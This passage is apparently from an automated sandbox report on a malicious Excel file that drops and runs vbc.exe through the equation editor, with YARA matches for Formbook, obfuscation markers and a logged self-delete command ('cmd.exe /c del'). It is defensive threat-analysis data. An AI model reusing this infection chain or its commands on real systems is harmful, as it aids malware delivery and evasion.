Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8B1 5_2_0041B8B1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B963 5_2_0041B963
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C4B 5_2_00408C4B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C50 5_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B493 5_2_0041B493
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B496 5_2_0041B496
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C539 5_2_0041C539
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D89 5_2_00402D89
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CE85 5_2_0041CE85
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF12 5_2_0041BF12
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C795 5_2_0041C795
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092E0C6 5_2_0092E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095D005 5_2_0095D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094905A 5_2_0094905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00933040 5_2_00933040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092E2E9 5_2_0092E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D1238 5_2_009D1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_009563DB 5_2_009563DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092F3CF 5_2_0092F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00932305 5_2_00932305
Source: C:\Users\Public\vbc.exe Code function: 5_2_00937353 5_2_00937353
Source: C:\Users\Public\vbc.exe Code function: 5_2_0097A37B 5_2_0097A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00965485 5_2_00965485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00941489 5_2_00941489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096D47D 5_2_0096D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094C5F0 5_2_0094C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093351F 5_2_0093351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00976540 5_2_00976540
Source: C:\Users\Public\vbc.exe Code function: 5_2_00934680 5_2_00934680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093E6C1 5_2_0093E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D2622 5_2_009D2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_009B579A 5_2_009B579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093C7BC 5_2_0093C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_009657C3 5_2_009657C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_009CF8EE 5_2_009CF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093C85C 5_2_0093C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095286D 5_2_0095286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D098E 5_2_009D098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_009329B2 5_2_009329B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_009469FE 5_2_009469FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_009B5955 5_2_009B5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E3A83 5_2_009E3A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_009DCBA4 5_2_009DCBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009BDBDA 5_2_009BDBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092FBD7 5_2_0092FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00957B00 5_2_00957B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_009CFDDD 5_2_009CFDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_00960D3B 5_2_00960D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093CD5B 5_2_0093CD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00962E2F 5_2_00962E2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094EE4C 5_2_0094EE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00940F3F 5_2_00940F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095DF7C 5_2_0095DF7C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007C905A 7_2_007C905A
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B3040 7_2_007B3040
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007DD005 7_2_007DD005
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007AE0C6 7_2_007AE0C6
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007AE2E9 7_2_007AE2E9
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00851238 7_2_00851238
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007FA37B 7_2_007FA37B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B7353 7_2_007B7353
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_008563BF 7_2_008563BF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B2305 7_2_007B2305
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007D63DB 7_2_007D63DB
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007AF3CF 7_2_007AF3CF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007ED47D 7_2_007ED47D
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0083443E 7_2_0083443E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007C1489 7_2_007C1489
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007E5485 7_2_007E5485
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007F6540 7_2_007F6540
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B351F 7_2_007B351F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007CC5F0 7_2_007CC5F0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007FA634 7_2_007FA634
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00852622 7_2_00852622
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007BE6C1 7_2_007BE6C1
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B4680 7_2_007B4680
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0083579A 7_2_0083579A
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007E57C3 7_2_007E57C3
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007BC7BC 7_2_007BC7BC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007D286D 7_2_007D286D
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007BC85C 7_2_007BC85C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0084F8EE 7_2_0084F8EE
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0085098E 7_2_0085098E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007C69FE 7_2_007C69FE
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0083394B 7_2_0083394B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B29B2 7_2_007B29B2
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00835955 7_2_00835955
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00863A83 7_2_00863A83
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0085CBA4 7_2_0085CBA4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0083DBDA 7_2_0083DBDA
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007D7B00 7_2_007D7B00
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007AFBD7 7_2_007AFBD7
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007BCD5B 7_2_007BCD5B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007E0D3B 7_2_007E0D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0084FDDD 7_2_0084FDDD
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007CEE4C 7_2_007CEE4C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007E2E2F 7_2_007E2E2F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007DDF7C 7_2_007DDF7C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0084CFB1 7_2_0084CFB1
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007C0F3F 7_2_007C0F3F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00822FDC 7_2_00822FDC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B493 7_2_0011B493
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B496 7_2_0011B496
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011C539 7_2_0011C539
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011C795 7_2_0011C795
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B8B1 7_2_0011B8B1
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B954 7_2_0011B954
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00108C50 7_2_00108C50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00108C4B 7_2_00108C4B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00102D90 7_2_00102D90
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00102D89 7_2_00102D89
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011CE85 7_2_0011CE85
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011BF12 7_2_0011BF12
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00102FB0 7_2_00102FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Processed APR12.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0099F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00973F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0097373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092DF5C appears 114 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007F3F92 appears 132 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007ADF5C appears 119 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007F373B appears 245 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 0081F970 appears 84 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007AE2A8 appears 38 times
Yara signature match
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: xles[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/11@9/9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Processed APR12.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR10F1.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Processed APR12.xlsx ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Processed APR12.xlsx Static file information: File size 2693120 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2229449674.0000000000699000.00000004.00000020.sdmp
Source: Processed APR12.xlsx Initial sample: OLE indicators vbamacros = False
Source: Processed APR12.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_012030AB push edx; retf 4_2_012030AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_01202BC7 push ss; ret 4_2_01202BC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E74DF push B9FFFFFEh; ret 4_2_001E74E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_002200C8 push esp; ret 4_2_002200C9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222B53 push ebx; retf 4_2_00222B5B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D09AC9 pushfd ; iretd 4_2_00D09ACA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B2A2 push cs; ret 5_2_0041B2A3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3FB push eax; ret 5_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B45C push eax; ret 5_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415414 push esp; ret 5_2_00415416
Source: C:\Users\Public\vbc.exe Code function: 5_2_00414F46 push cs; ret 5_2_00414F47
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF12 push dword ptr [8427D5C5h]; ret 5_2_0041C1FF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415FC5 push ebp; ret 5_2_00415FC6
Source: C:\Users\Public\vbc.exe Code function: 5_2_012030AB push edx; retf 5_2_012030AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_01202BC7 push ss; ret 5_2_01202BC8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092DFA1 push ecx; ret 5_2_0092DFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007ADFA1 push ecx; ret 7_2_007ADFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B2A2 push cs; ret 7_2_0011B2A3
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B3A5 push eax; ret 7_2_0011B3F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B3F2 push eax; ret 7_2_0011B3F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B3FB push eax; ret 7_2_0011B462
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00115414 push esp; ret 7_2_00115416
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B45C push eax; ret 7_2_0011B462
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011BF12 push dword ptr [8427D5C5h]; ret 7_2_0011C1FF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00114F46 push cs; ret 7_2_00114F47
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00115FC5 push ebp; ret 7_2_00115FC6
Source: initial sample Static PE information: section name: .text entropy: 7.47179869849

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
